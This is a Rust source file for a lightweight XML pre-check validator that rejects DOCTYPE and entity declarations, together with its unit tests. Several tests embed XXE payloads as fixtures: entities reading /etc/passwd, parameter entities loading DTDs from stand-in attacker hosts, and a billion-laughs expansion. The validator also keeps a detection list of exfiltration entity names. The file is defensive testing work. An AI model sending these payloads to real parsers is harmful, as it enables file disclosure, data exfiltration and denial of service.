1use std::error::Error;
53use std::fmt;
54
/// Configuration for a lightweight, text-based XML security pre-check.
///
/// The validator never parses the document; it scans the raw text for
/// constructs that are commonly abused (DOCTYPE and entity declarations)
/// and enforces an upper bound on the input size.
#[derive(Clone, Debug)]
pub struct XmlSecurityValidator {
    /// When `true`, any document containing a `<!DOCTYPE` marker is rejected.
    pub reject_doctype: bool,
    /// Largest accepted document length, in bytes of the UTF-8 input.
    pub max_document_size: usize,
    /// When `true`, entity declarations (internal, external and parameter
    /// entities) are rejected in addition to the DOCTYPE check.
    pub strict_validation: bool,
}
65
66impl Default for XmlSecurityValidator {
67 fn default() -> Self {
68 Self {
69 reject_doctype: true,
70 max_document_size: 10 * 1024 * 1024, strict_validation: true,
72 }
73 }
74}
75
76impl XmlSecurityValidator {
77 pub fn new(reject_doctype: bool, max_document_size: usize, strict_validation: bool) -> Self {
79 Self {
80 reject_doctype,
81 max_document_size,
82 strict_validation,
83 }
84 }
85
86 pub fn validate(&self, xml: &str) -> Result<(), SecurityViolation> {
99 if xml.len() > self.max_document_size {
101 return Err(SecurityViolation::DocumentSizeExceeded {
102 size: xml.len(),
103 max_size: self.max_document_size,
104 });
105 }
106
107 if self.reject_doctype && self.contains_doctype(xml) {
109 return Err(SecurityViolation::DoctypeDetected);
110 }
111
112 if self.strict_validation {
114 if self.contains_parameter_entity(xml) {
116 return Err(SecurityViolation::ParameterEntityDetected);
117 }
118
119 if self.contains_external_entity(xml) {
121 return Err(SecurityViolation::ExternalEntityDetected);
122 }
123
124 if self.contains_entity_declaration(xml) {
126 return Err(SecurityViolation::EntityDeclarationDetected);
127 }
128 }
129
130 Ok(())
131 }
132
133 fn contains_doctype(&self, xml: &str) -> bool {
140 if !xml.contains("<!") {
142 return false;
143 }
144
145 let upper = xml.to_uppercase();
147 upper.contains("<!DOCTYPE")
148 }
149
150 fn contains_external_entity(&self, xml: &str) -> bool {
154 if !xml.contains("<!") {
156 return false;
157 }
158
159 let upper = xml.to_uppercase();
160
161 if upper.contains("<!ENTITY") {
163 upper.contains("SYSTEM") || upper.contains("PUBLIC")
164 } else {
165 false
166 }
167 }
168
169 fn contains_entity_declaration(&self, xml: &str) -> bool {
173 if !xml.contains("<!") {
175 return false;
176 }
177
178 let upper = xml.to_uppercase();
179 upper.contains("<!ENTITY")
180 }
181
182 fn contains_parameter_entity(&self, xml: &str) -> bool {
190 xml.contains("<!ENTITY %")
193 || xml.contains("%dtd;")
194 || xml.contains("%all;")
195 || xml.contains("%file;")
196 || xml.contains("%send;")
197 || xml.contains("%eval;")
198 }
199}
200
/// Reason a document was rejected by `XmlSecurityValidator::validate`.
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum SecurityViolation {
    /// The document contains a `<!DOCTYPE` marker.
    DoctypeDetected,
    /// An entity declaration uses a `SYSTEM` or `PUBLIC` identifier.
    ExternalEntityDetected,
    /// The document contains an `<!ENTITY` declaration.
    EntityDeclarationDetected,
    /// The document declares or references a parameter entity.
    ParameterEntityDetected,
    /// The document is longer than the configured limit.
    DocumentSizeExceeded {
        /// Actual length of the rejected document, in bytes.
        size: usize,
        /// Configured maximum length, in bytes.
        max_size: usize,
    },
}
220
221impl fmt::Display for SecurityViolation {
222 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
223 match self {
224 Self::DoctypeDetected => write!(
225 f,
226 "DOCTYPE declarations are prohibited for security (XXE prevention)"
227 ),
228 Self::ExternalEntityDetected => write!(
229 f,
230 "External entity references (SYSTEM/PUBLIC) are prohibited"
231 ),
232 Self::EntityDeclarationDetected => write!(
233 f,
234 "Entity declarations are prohibited (billion laughs prevention)"
235 ),
236 Self::ParameterEntityDetected => write!(
237 f,
238 "Parameter entities are prohibited (data exfiltration prevention)"
239 ),
240 Self::DocumentSizeExceeded { size, max_size } => write!(
241 f,
242 "Document size ({} bytes) exceeds security limit ({} bytes)",
243 size, max_size
244 ),
245 }
246 }
247}
248
249impl Error for SecurityViolation {}
250
#[cfg(test)]
mod tests {
    use super::*;

    /// Runs the default (most restrictive) validator over `xml`.
    fn check(xml: &str) -> Result<(), SecurityViolation> {
        XmlSecurityValidator::default().validate(xml)
    }

    /// Validator that lets DOCTYPE through so the strict entity checks
    /// decide the outcome.
    fn strict_without_doctype_gate() -> XmlSecurityValidator {
        XmlSecurityValidator {
            reject_doctype: false,
            strict_validation: true,
            ..Default::default()
        }
    }

    // ---- construction -----------------------------------------------------

    #[test]
    fn test_validator_default() {
        let validator = XmlSecurityValidator::default();
        assert!(validator.reject_doctype);
        assert_eq!(validator.max_document_size, 10 * 1024 * 1024);
        assert!(validator.strict_validation);
    }

    #[test]
    fn test_validator_custom() {
        let validator = XmlSecurityValidator::new(false, 1024, false);
        assert!(!validator.reject_doctype);
        assert_eq!(validator.max_document_size, 1024);
        assert!(!validator.strict_validation);
    }

    // ---- DOCTYPE gate (default configuration) -----------------------------

    #[test]
    fn test_safe_xml_passes() {
        let xml = r#"<?xml version="1.0"?><hedl><data>safe content</data></hedl>"#;
        assert_eq!(check(xml), Ok(()));
    }

    #[test]
    fn test_doctype_detection_uppercase() {
        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY test "value">]>
<hedl><data>test</data></hedl>"#;

        assert_eq!(check(xml), Err(SecurityViolation::DoctypeDetected));
    }

    #[test]
    fn test_doctype_detection_lowercase() {
        let xml = r#"<?xml version="1.0"?>
<!doctype hedl [<!ENTITY test "value">]>
<hedl><data>test</data></hedl>"#;

        assert_eq!(check(xml), Err(SecurityViolation::DoctypeDetected));
    }

    #[test]
    fn test_doctype_detection_mixed_case() {
        let xml = r#"<?xml version="1.0"?>
<!DoCtYpE hedl [<!ENTITY test "value">]>
<hedl><data>test</data></hedl>"#;

        assert_eq!(check(xml), Err(SecurityViolation::DoctypeDetected));
    }

    // With the default configuration the DOCTYPE check runs before the entity
    // checks, so every DTD-based attack below is reported as `DoctypeDetected`.

    #[test]
    fn test_external_entity_system() {
        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<hedl><data>&xxe;</data></hedl>"#;

        assert_eq!(check(xml), Err(SecurityViolation::DoctypeDetected));
    }

    #[test]
    fn test_external_entity_public() {
        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY xxe PUBLIC "publicId" "http://evil.com/evil.dtd">]>
<hedl><data>&xxe;</data></hedl>"#;

        assert_eq!(check(xml), Err(SecurityViolation::DoctypeDetected));
    }

    #[test]
    fn test_parameter_entity_attack() {
        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<hedl>&send;</hedl>"#;

        assert_eq!(check(xml), Err(SecurityViolation::DoctypeDetected));
    }

    #[test]
    fn test_billion_laughs_attack() {
        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<hedl>&lol3;</hedl>"#;

        assert_eq!(check(xml), Err(SecurityViolation::DoctypeDetected));
    }

    // ---- size limit -------------------------------------------------------

    #[test]
    fn test_document_size_limit() {
        let validator = XmlSecurityValidator {
            max_document_size: 100,
            ..Default::default()
        };

        let large_xml = format!(
            r#"<?xml version="1.0"?><hedl><data>{}</data></hedl>"#,
            "A".repeat(200)
        );
        assert!(large_xml.len() > 100);

        // The violation reports the exact input length and the configured limit.
        assert_eq!(
            validator.validate(&large_xml),
            Err(SecurityViolation::DocumentSizeExceeded {
                size: large_xml.len(),
                max_size: 100,
            })
        );
    }

    // ---- relaxed / strict-only configurations -----------------------------

    #[test]
    fn test_disable_doctype_check() {
        let validator = XmlSecurityValidator {
            reject_doctype: false,
            strict_validation: false,
            ..Default::default()
        };

        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ELEMENT hedl ANY>]>
<hedl><data>test</data></hedl>"#;

        assert_eq!(validator.validate(xml), Ok(()));
    }

    #[test]
    fn test_strict_validation_entity_detection() {
        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY test "value">]>
<hedl><data>&test;</data></hedl>"#;

        assert_eq!(
            strict_without_doctype_gate().validate(xml),
            Err(SecurityViolation::EntityDeclarationDetected)
        );
    }

    #[test]
    fn test_strict_validation_external_entity() {
        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<hedl><data>&xxe;</data></hedl>"#;

        assert_eq!(
            strict_without_doctype_gate().validate(xml),
            Err(SecurityViolation::ExternalEntityDetected)
        );
    }

    #[test]
    fn test_strict_validation_parameter_entity() {
        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY % file SYSTEM "file:///etc/passwd">]>
<hedl><data>test</data></hedl>"#;

        assert_eq!(
            strict_without_doctype_gate().validate(xml),
            Err(SecurityViolation::ParameterEntityDetected)
        );
    }

    // ---- accepted false positives -----------------------------------------
    // The validator scans raw text and does not understand comments or CDATA,
    // so a literal `<!DOCTYPE` in either is still rejected.

    #[test]
    fn test_comment_with_doctype_string() {
        let xml = r#"<?xml version="1.0"?>
<!-- This comment mentions <!DOCTYPE but isn't one -->
<hedl><data>safe</data></hedl>"#;

        assert_eq!(check(xml), Err(SecurityViolation::DoctypeDetected));
    }

    #[test]
    fn test_cdata_with_doctype_string() {
        let xml = r#"<?xml version="1.0"?>
<hedl><data><![CDATA[<!DOCTYPE test>]]></data></hedl>"#;

        assert_eq!(check(xml), Err(SecurityViolation::DoctypeDetected));
    }

    // ---- error messages ---------------------------------------------------

    #[test]
    fn test_security_violation_display() {
        let doctype = SecurityViolation::DoctypeDetected.to_string();
        assert!(doctype.contains("DOCTYPE"));
        assert!(doctype.contains("XXE"));

        let external = SecurityViolation::ExternalEntityDetected.to_string();
        assert!(external.contains("External entity"));

        let declaration = SecurityViolation::EntityDeclarationDetected.to_string();
        assert!(declaration.contains("Entity declarations"));
        assert!(declaration.contains("billion laughs"));

        let parameter = SecurityViolation::ParameterEntityDetected.to_string();
        assert!(parameter.contains("Parameter entities"));
        assert!(parameter.contains("exfiltration"));

        let oversized = SecurityViolation::DocumentSizeExceeded {
            size: 1000,
            max_size: 500,
        }
        .to_string();
        assert!(oversized.contains("1000"));
        assert!(oversized.contains("500"));
    }

    // ---- benign documents -------------------------------------------------

    #[test]
    fn test_empty_xml() {
        assert_eq!(check(""), Ok(()));
    }

    #[test]
    fn test_xml_declaration_only() {
        assert_eq!(check(r#"<?xml version="1.0"?>"#), Ok(()));
    }

    #[test]
    fn test_simple_element() {
        assert_eq!(check(r#"<root>test</root>"#), Ok(()));
    }

    #[test]
    fn test_nested_elements() {
        let xml = r#"<?xml version="1.0"?>
<root>
  <child1>value1</child1>
  <child2>
    <nested>value2</nested>
  </child2>
</root>"#;
        assert_eq!(check(xml), Ok(()));
    }

    #[test]
    fn test_attributes_allowed() {
        let xml = r#"<?xml version="1.0"?>
<root attr1="value1" attr2="value2">
  <child id="123">content</child>
</root>"#;
        assert_eq!(check(xml), Ok(()));
    }

    #[test]
    fn test_unicode_content() {
        let xml = r#"<?xml version="1.0" encoding="UTF-8"?>
<root>
  <data>Hello 世界 🌍</data>
</root>"#;
        assert_eq!(check(xml), Ok(()));
    }

    #[test]
    fn test_special_characters_escaped() {
        // Predefined character references must not be mistaken for entity abuse.
        let xml = r#"<?xml version="1.0"?>
<root>
  <data>&lt;tag&gt; &amp; &quot;quoted&quot;</data>
</root>"#;
        assert_eq!(check(xml), Ok(()));
    }
}